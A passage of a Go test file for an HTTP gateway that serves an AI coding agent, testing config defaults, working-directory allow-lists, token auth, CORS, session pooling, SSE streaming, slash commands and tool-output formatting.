+	if cfg.ToolVisibility.Mode != "none" {
+		t.Errorf("tool vis = %q, want none", cfg.ToolVisibility.Mode)
+	}
+	if cfg.SystemPromptMode != "ignore" {
+		t.Errorf("sys prompt mode = %q, want ignore", cfg.SystemPromptMode)
+	}
+	if cfg.RequestTimeoutSecs != 600 {
+		t.Errorf("timeout = %d, want 600", cfg.RequestTimeoutSecs)
+	}
+	if cfg.MaxConcurrentReqs != 10 {
+		t.Errorf("max concurrent = %d, want 10", cfg.MaxConcurrentReqs)
+	}
+	if cfg.AllowedWorkDirs == nil || len(*cfg.AllowedWorkDirs) != 1 {
+		t.Error("expected 1 allowed work dir")
+	}
+}
+
+func TestValidateWorkDir(t *testing.T) {
+	tests := []struct {
+		name    string
+		allowed *[]string
+		dir     string
+		wantErr bool
+	}{
+		{"nil=no check", nil, "/any/path", false},
+		{"empty=deny all", &[]string{}, "/any/path", true},
+		{"exact match", &[]string{"/home/user/projects"}, "/home/user/projects", false},
+		{"prefix match", &[]string{"/home/user/projects"}, "/home/user/projects/foo", false},
+		{"evil prefix", &[]string{"/home/user/projects"}, "/home/user/projects-evil", true},
+		{"no match", &[]string{"/opt/repos"}, "/home/user/projects", true},
+		{"multi allowed", &[]string{"/opt/repos", "/home/user"}, "/home/user/foo", false},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			cfg := &GatewayConfig{AllowedWorkDirs: tt.allowed}
+			err := cfg.ValidateWorkDir(tt.dir)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateWorkDir(%q) error = %v, wantErr = %v", tt.dir, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestSaveAndLoadGatewayConfig(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "gateway.json")
+	cfg := DefaultGatewayConfig()
+	if err := SaveGatewayConfig(path, cfg); err != nil {
+		t.Fatalf("save: %v", err)
+	}
+	loaded, err := LoadGatewayConfigFrom(path)
+	if err != nil {
+		t.Fatalf("reload: %v", err)
+	}
+	if loaded.Listen != ":8080" {
+		t.Errorf("reloaded listen = %q", loaded.Listen)
+	}
+}
+
+// --- Auth middleware tests ---
+
+func TestAuthMiddleware_Disabled(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: false}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+func TestAuthMiddleware_ValidToken(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer sk-test")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+func TestAuthMiddleware_InvalidToken(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer wrong-token")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+func TestAuthMiddleware_MissingHeader(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+// --- CORS middleware tests ---
+
+func TestCORSMiddleware_Enabled(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://example.com"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "http://example.com" {
+		t.Errorf("CORS origin = %q, want http://example.com", got)
+	}
+}
+
+func TestCORSMiddleware_MultipleOriginsEchoesRequestOrigin(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://a.example", "http://b.example"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Origin", "http://b.example")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "http://b.example" {
+		t.Errorf("CORS origin = %q, want http://b.example", got)
+	}
+}
+
+func TestCORSMiddleware_MultipleOriginsRejectsUnknownOrigin(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://a.example", "http://b.example"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Origin", "http://evil.example")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "" {
+		t.Errorf("CORS origin = %q, want empty", got)
+	}
+}
+
+func TestCORSMiddleware_Preflight(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("OPTIONS", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusNoContent {
+		t.Errorf("status = %d, want 204", w.Code)
+	}
+}
+
+// --- Concurrency middleware tests ---
+
+func TestConcurrencyMiddleware_NoLimit(t *testing.T) {
+	handler := ConcurrencyMiddleware(0, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+// --- SessionPool tests ---
+
+func TestSessionPool_PutGet(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", WorkDir: "/tmp", LastUsed: time.Now()}
+	if err := pool.Put(sess); err != nil {
+		t.Fatalf("put: %v", err)
+	}
+	got := pool.Get("sess-1")
+	if got == nil || got.ID != "sess-1" {
+		t.Error("expected to get session back")
+	}
+	if pool.Count() != 1 {
+		t.Errorf("count = %d, want 1", pool.Count())
+	}
+}
+
+func TestSessionPool_MaxSessions(t *testing.T) {
+	pool := NewSessionPool(1, 0)
+	defer pool.Stop()
+
+	sess1 := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	if err := pool.Put(sess1); err != nil {
+		t.Fatalf("put 1: %v", err)
+	}
+	sess2 := &GatewaySession{ID: "sess-2", LastUsed: time.Now()}
+	if err := pool.Put(sess2); err == nil {
+		t.Error("expected pool full error")
+	}
+}
+
+func TestSessionPool_Remove(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	pool.Put(&GatewaySession{ID: "sess-1", LastUsed: time.Now()})
+	pool.Remove("sess-1")
+	if pool.Get("sess-1") != nil {
+		t.Error("session should be removed")
+	}
+}
+
+func TestSessionPool_List(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	pool.Put(&GatewaySession{ID: "a", LastUsed: time.Now()})
+	pool.Put(&GatewaySession{ID: "b", LastUsed: time.Now()})
+	ids := pool.List()
+	if len(ids) != 2 {
+		t.Errorf("list len = %d, want 2", len(ids))
+	}
+}
+
+// --- parseMessages tests ---
+
+func TestParseMessages(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "you are helpful"},
+		{Role: "user", Content: "hello"},
+		{Role: "assistant", Content: "hi there"},
+		{Role: "user", Content: "explain main.go"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "explain main.go" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 1 || sysMsgs[0] != "you are helpful" {
+		t.Errorf("sysMsgs = %v", sysMsgs)
+	}
+	if len(history) != 2 { // "hello" and "hi there"
+		t.Errorf("history len = %d, want 2", len(history))
+	}
+}
+
+func TestParseMessages_NoUser(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "test"},
+	}
+	lastUser, _, _ := parseMessages(msgs)
+	if lastUser != "" {
+		t.Errorf("expected empty lastUser, got %q", lastUser)
+	}
+}
+
+// --- SSE writer tests ---
+
+func TestSSEWriter_ContentDelta(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "sess-1")
+	sse.WriteContentDelta("hello")
+	body := w.Body.String()
+	if !strings.Contains(body, `"content":"hello"`) {
+		t.Errorf("body doesn't contain content delta: %s", body)
+	}
+	if !strings.HasPrefix(body, "data: ") {
+		t.Error("SSE data should start with 'data: '")
+	}
+}
+
+func TestSSEWriter_Done(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "sess-1")
+	sse.WriteDone(&CompletionUsage{PromptTokens: 100, CompletionTokens: 50, TotalTokens: 150})
+	body := w.Body.String()
+	if !strings.Contains(body, `"finish_reason":"stop"`) {
+		t.Errorf("missing finish_reason: %s", body)
+	}
+	if !strings.Contains(body, "[DONE]") {
+		t.Error("missing [DONE] sentinel")
+	}
+}
+
+func TestSSEWriter_ToolStatusContent(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "")
+	sse.WriteToolStatusContent("🔧 [read] main.go", "running")
+	body := w.Body.String()
+	if !strings.Contains(body, "[running]") {
+		t.Errorf("missing status in content: %s", body)
+	}
+	if !strings.Contains(body, "read") {
+		t.Errorf("missing tool name in content: %s", body)
+	}
+}
+
+func TestSSEWriter_ToolStatusEvent(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "")
+	sse.WriteToolStatusEvent("bash", "running", map[string]any{"command": "ls"})
+	body := w.Body.String()
+	if !strings.Contains(body, "event: tool_status") {
+		t.Errorf("missing tool_status event: %s", body)
+	}
+	if !strings.Contains(body, `"tool":"bash"`) {
+		t.Errorf("missing tool name: %s", body)
+	}
+}
+
+// --- writeError / writeJSON tests ---
+
+func TestWriteError(t *testing.T) {
+	w := httptest.NewRecorder()
+	writeError(w, http.StatusBadRequest, "bad input", "invalid_request_error")
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+	var resp ErrorResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error.Message != "bad input" {
+		t.Errorf("error message = %q", resp.Error.Message)
+	}
+}
+
+// --- Health handler test ---
+
+func TestHealthHandler(t *testing.T) {
+	srv := &Server{
+		version: "test",
+		pool:    NewSessionPool(0, 0),
+	}
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("GET", "/health", nil)
+	w := httptest.NewRecorder()
+	srv.handleHealth(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	var resp HealthResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Status != "ok" {
+		t.Errorf("status = %q", resp.Status)
+	}
+	if resp.Version != "test" {
+		t.Errorf("version = %q", resp.Version)
+	}
+}
+
+// --- Models handler test ---
+
+func TestModelsHandler(t *testing.T) {
+	mockP := provider.NewMockProvider("test", []*provider.Model{
+		{ID: "m1", Name: "Model 1"},
+		{ID: "m2", Name: "Model 2"},
+	}, nil)
+	srv := &Server{
+		provider: mockP,
+	}
+	req := httptest.NewRequest("GET", "/v1/models", nil)
+	w := httptest.NewRecorder()
+	srv.handleModels(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	var resp ModelListResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Object != "list" {
+		t.Errorf("object = %q", resp.Object)
+	}
+	if len(resp.Data) != 2 {
+		t.Errorf("models = %d, want 2", len(resp.Data))
+	}
+}
+
+// --- Chat handler slash command test ---
+
+func newTestServer(t *testing.T) *Server {
+	t.Helper()
+	cwd := t.TempDir()
+	models := []*provider.Model{
+		{ID: "m1", Name: "Model 1"},
+	}
+	mockP := provider.NewMockProvider("test", models, nil)
+
+	settings := config.DefaultSettings()
+	settings.SessionDir = filepath.Join(cwd, "sessions")
+
+	sbMgr := sandbox.NewManager(cwd)
+	sbMgr.SetLevel(sandbox.LevelNone)
+
+	skillsMgr := skills.NewManager(filepath.Join(cwd, "skills-global"), filepath.Join(cwd, "skills-project"))
+
+	pool := NewSessionPool(0, 0)
+
+	return &Server{
+		cfg:        DefaultGatewayConfig(),
+		settings:   settings,
+		version:    "test",
+		provider:   mockP,
+		model:      models[0],
+		sandboxMgr: sbMgr,
+		skillsMgr:  skillsMgr,
+		pool:       pool,
+	}
+}
+
+func TestCloneModelCopiesMutableFields(t *testing.T) {
+	model := &provider.Model{
+		ID:     "m1",
+		Input:  []string{"text"},
+		Compat: &provider.ModelCompat{ThinkingFormat: "anthropic"},
+	}
+
+	clone := cloneModel(model)
+	clone.Input[0] = "image"
+	clone.Compat.ThinkingFormat = "deepseek"
+
+	if model.Input[0] != "text" {
+		t.Fatalf("original input mutated: %v", model.Input)
+	}
+	if model.Compat.ThinkingFormat != "anthropic" {
+		t.Fatalf("original compat mutated: %s", model.Compat.ThinkingFormat)
+	}
+}
+
+func TestChatHandler_SlashHelp(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/help"}],"stream":false}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/help" {
+		t.Errorf("x_command = %q, want /help", resp.XCommand)
+	}
+	if len(resp.Choices) == 0 || resp.Choices[0].Message == nil {
+		t.Fatal("missing choice")
+	}
+	if !strings.Contains(resp.Choices[0].Message.Content, "/clear") {
+		t.Error("help output should mention /clear")
+	}
+}
+
+func TestChatHandler_SlashClear(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/clear"}],"stream":false,"x_session_id":"test-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/clear" {
+		t.Errorf("x_command = %q, want /clear", resp.XCommand)
+	}
+	if !strings.Contains(resp.Choices[0].Message.Content, "Conversation cleared") {
+		t.Errorf("expected clear confirmation, got %q", resp.Choices[0].Message.Content)
+	}
+}
+
+func TestChatHandler_SlashMode(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/mode plan"}],"stream":false,"x_session_id":"mode-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d", w.Code)
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if !strings.Contains(resp.Choices[0].Message.Content, "PLAN") {
+		t.Errorf("expected PLAN in response, got %q", resp.Choices[0].Message.Content)
+	}
+}
+
+func TestChatHandler_EmptyMessages(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[]}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+}
+
+func TestChatHandler_InvalidJSON(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader("{invalid"))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+}
+
+func TestChatHandler_WorkDirForbidden(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// Set restrictive allowedWorkDirs
+	allowed := []string{"/opt/allowed"}
+	srv.cfg.AllowedWorkDirs = &allowed
+
+	body := `{"messages":[{"role":"user","content":"hi"}],"x_working_dir":"/etc/evil"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusForbidden {
+		t.Errorf("status = %d, want 403", w.Code)
+	}
+}
+
+// --- Commands tests ---
+
+func TestCommands_UnknownCommand(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.handleCommand(nil, "/foobar")
+	if result == nil {
+		t.Fatal("expected result for unknown command")
+	}
+	if !result.Error {
+		t.Error("expected error=true for unknown command")
+	}
+}
+
+func TestCommands_NotACommand(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.handleCommand(nil, "hello world")
+	if result != nil {
+		t.Error("non-command should return nil")
+	}
+}
+
+func TestCommands_Status(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "test-sess", WorkDir: "/tmp", Mode: "agent"}
+	result := srv.cmdStatus(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !strings.Contains(result.Message, "AGENT") {
+		t.Errorf("status should show mode, got %q", result.Message)
+	}
+	if !strings.Contains(result.Message, "test-sess") {
+		t.Errorf("status should show session ID, got %q", result.Message)
+	}
+}
+
+func TestCommands_CompactNoSession(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdCompact(nil)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !result.Error {
+		t.Error("expected error for nil session")
+	}
+}
+
+func TestCommands_CompactTooShort(t *testing.T) {
+	srv := newTestServer(t)
+	// Create a session with less than 2 messages
+	sess := &GatewaySession{ID: "test-sess", WorkDir: "/tmp"}
+	mgr := session.New(t.TempDir(), t.TempDir())
+	mgr.Init()
+	sess.Manager = mgr
+	result := srv.cmdCompact(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if !result.Error {
+		t.Error("expected error for too-short conversation")
+	}
+	if !strings.Contains(result.Message, "too short") {
+		t.Errorf("expected 'too short' message, got %q", result.Message)
+	}
+}
+
+func TestCommands_CompactSetsFlag(t *testing.T) {
+	srv := newTestServer(t)
+	sess := &GatewaySession{ID: "test-sess", WorkDir: t.TempDir()}
+	mgr := session.New(sess.WorkDir, t.TempDir())
+	mgr.Init()
+	// Append 2 messages so conversation is long enough
+	mgr.AppendMessage(provider.NewUserMessage("hello"))
+	mgr.AppendMessage(provider.NewAssistantMessage([]provider.ContentBlock{{Type: "text", Text: "hi"}}))
+	sess.Manager = mgr
+
+	result := srv.cmdCompact(sess)
+	if result == nil {
+		t.Fatal("expected result")
+	}
+	if result.Error {
+		t.Errorf("unexpected error: %s", result.Message)
+	}
+	if !sess.ForceCompact {
+		t.Error("expected ForceCompact to be set")
+	}
+	if !strings.Contains(result.Message, "compaction") {
+		t.Errorf("expected compaction confirmation, got %q", result.Message)
+	}
+}
+
+func TestChatHandler_SlashCompact(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/compact"}],"stream":false,"x_session_id":"compact-sess"}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	var resp ChatCompletionResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.XCommand != "/compact" {
+		t.Errorf("x_command = %q, want /compact", resp.XCommand)
+	}
+}
+
+// --- Tool format tests ---
+
+func TestFormatToolExpanded_Read(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n\nfunc main() {}\n",
+	}
+	text := formatToolExpanded(tc)
+	// Markdown header
+	if !strings.Contains(text, "🔧 read: main.go") {
+		t.Errorf("missing markdown header: %s", text)
+	}
+	// Code fence with language
+	if !strings.Contains(text, "```go\n") {
+		t.Errorf("missing go code fence: %s", text)
+	}
+	if !strings.Contains(text, "package main") {
+		t.Errorf("missing result content: %s", text)
+	}
+	// Closing fence
+	if !strings.Contains(text, "\n```") {
+		t.Errorf("missing closing fence: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_Bash(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "go test ./..."},
+		Status: "completed",
+		Result: "ok  pkg 0.5s\n",
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "🔧 bash: go test ./...") {
+		t.Errorf("missing markdown header: %s", text)
+	}
+	if !strings.Contains(text, "```bash\n") {
+		t.Errorf("missing bash code fence: %s", text)
+	}
+	if !strings.Contains(text, "ok  pkg") {
+		t.Errorf("missing stdout: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_EditWithDiff(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "edit",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Diff:   &tools.FileDiff{Path: "main.go", Added: 2, Deleted: 1, Unified: "+func new1() {}\n-func old() {}\n"},
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "```diff\n") {
+		t.Errorf("missing diff code fence: %s", text)
+	}
+	if !strings.Contains(text, "+func new1") {
+		t.Errorf("missing diff content: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_Error(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "false"},
+		Status: "failed",
+		Error:  fmt.Errorf("exit code 1"),
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "Error: exit code 1") {
+		t.Errorf("missing error: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_ReadJSON(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "package.json"},
+		Status: "completed",
+		Result: `{"name": "test"}`,
+	}
+	text := formatToolExpanded(tc)
+	if !strings.Contains(text, "```json\n") {
+		t.Errorf("should use json fence for .json file: %s", text)
+	}
+}
+
+func TestFormatToolExpanded_GrepPlain(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "grep",
+		Args:   map[string]any{"pattern": "TODO", "path": "./src"},
+		Status: "completed",
+		Result: "src/main.go:10: // TODO fix this\n",
+	}
+	text := formatToolExpanded(tc)
+	// grep should use plain text fence (no language)
+	if !strings.Contains(text, "```\n") {
+		t.Errorf("grep should use plain code fence: %s", text)
+	}
+}
+
+func TestFormatToolRunning(t *testing.T) {
+	text := formatToolRunning("read", map[string]any{"path": "main.go"})
+	if !strings.Contains(text, "\u23f3") {
+		t.Errorf("missing hourglass: %s", text)
+	}
+	if !strings.Contains(text, "read") {
+		t.Errorf("missing tool name: %s", text)
+	}
+}
+
+func TestInferCodeLang(t *testing.T) {
+	tests := []struct {
+		tool string
+		args map[string]any
+		want string
+	}{
+		{"bash", nil, "bash"},
+		{"read", map[string]any{"path": "main.go"}, "go"},
+		{"read", map[string]any{"path": "app.py"}, "python"},
+		{"read", map[string]any{"path": "style.css"}, "css"},
+		{"read", map[string]any{"path": "Makefile"}, "makefile"},
+		{"read", map[string]any{"path": "Dockerfile"}, "dockerfile"},
+		{"read", map[string]any{"path": "data.json"}, "json"},
+		{"grep", map[string]any{"pattern": "x"}, ""},
+		{"ls", nil, ""},
+	}
+	for _, tt := range tests {
+		got := inferCodeLang(tt.tool, tt.args)
+		if got != tt.want {
+			t.Errorf("inferCodeLang(%q, %v) = %q, want %q", tt.tool, tt.args, got, tt.want)
+		}
+	}
+}
+
+func TestToolKeyArg(t *testing.T) {
+	tests := []struct {
+		name string
+		tool string
+		args map[string]any
+		want string
+	}{
+		{"read path", "read", map[string]any{"path": "main.go"}, "main.go"},
+		{"bash command", "bash", map[string]any{"command": "ls -la"}, "ls -la"},
+		{"grep", "grep", map[string]any{"pattern": "TODO", "path": "src/"}, "TODO src/"},
+		{"nil args", "read", nil, ""},
+		{"unknown tool", "foo", map[string]any{"name": "bar"}, "bar"},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := toolKeyArg(tt.tool, tt.args)
+			if got != tt.want {
+				t.Errorf("toolKeyArg(%q) = %q, want %q", tt.tool, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestChatHandler_SlashHelp_Streaming(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	body := `{"messages":[{"role":"user","content":"/help"}],"stream":true}`
+	req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, body = %s", w.Code, w.Body.String())
+	}
+	resBody := w.Body.String()
+	if !strings.Contains(resBody, "data: ") {
+		t.Error("streaming response should contain SSE data lines")
+	}
+	if !strings.Contains(resBody, "[DONE]") {
+		t.Error("streaming response should end with [DONE]")
+	}
+	if !strings.Contains(resBody, "/clear") {
+		t.Error("help content should mention /clear")
+	}
+	ct := w.Header().Get("Content-Type")
+	if !strings.Contains(ct, "text/event-stream") {
+		t.Errorf("Content-Type = %q, want text/event-stream", ct)
+	}
+}
+
+// --- Collapsed mode tests ---
+
+func TestFormatToolCollapsed_Read(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n\nfunc main() {}\n",
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "read") {
+		t.Errorf("missing tool name: %s", text)
+	}
+	if !strings.Contains(text, "main.go") {
+		t.Errorf("missing path: %s", text)
+	}
+	if !strings.Contains(text, "✅") {
+		t.Errorf("missing success marker: %s", text)
+	}
+	// Should NOT contain the file content
+	if strings.Contains(text, "package main") {
+		t.Errorf("collapsed should not contain file content: %s", text)
+	}
+	if strings.Contains(text, "```") {
+		t.Errorf("collapsed should not contain code fences: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_EditShowsDiff(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "edit",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Diff:   &tools.FileDiff{Path: "main.go", Added: 1, Deleted: 1, Unified: "+new line\n-old line\n"},
+	}
+	text := formatToolCollapsed(tc)
+	// edit with diff should always show the diff even in collapsed mode
+	if !strings.Contains(text, "```diff") {
+		t.Errorf("collapsed edit should show diff fence: %s", text)
+	}
+	if !strings.Contains(text, "+new line") {
+		t.Errorf("collapsed edit should show diff content: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_ErrorAlwaysShown(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "false"},
+		Status: "failed",
+		Error:  fmt.Errorf("exit code 1"),
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "Error: exit code 1") {
+		t.Errorf("collapsed error should always show: %s", text)
+	}
+}
+
+func TestFormatToolCollapsed_BashNoOutput(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "bash",
+		Args:   map[string]any{"command": "go test ./..."},
+		Status: "completed",
+		Result: "ok  pkg 0.5s\n",
+	}
+	text := formatToolCollapsed(tc)
+	if !strings.Contains(text, "✅") {
+		t.Errorf("missing success marker: %s", text)
+	}
+	if strings.Contains(text, "ok  pkg") {
+		t.Errorf("collapsed bash should not show stdout: %s", text)
+	}
+}
+
+// --- Dispatcher test ---
+
+func TestFormatToolResult_Dispatches(t *testing.T) {
+	tc := &toolCallInfo{
+		Name:   "read",
+		Args:   map[string]any{"path": "main.go"},
+		Status: "completed",
+		Result: "package main\n",
+	}
+
